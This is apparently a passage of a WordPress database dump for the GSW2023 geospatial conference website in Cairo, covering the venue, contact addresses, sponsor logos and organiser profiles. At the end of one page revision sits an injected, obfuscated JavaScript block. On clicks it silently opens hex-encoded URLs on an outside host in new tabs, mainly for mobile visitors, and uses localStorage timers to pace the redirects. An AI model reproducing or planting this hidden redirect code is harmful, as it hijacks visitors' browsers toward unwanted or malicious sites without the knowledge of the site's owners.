-ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 13:50:13','2023-06-09 13:50:13','',3066,'https://gsw2023.com/?p=4645',0,'revision','',0),
(4646,1,'2023-06-09 14:20:48','2023-06-09 14:20:48','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" 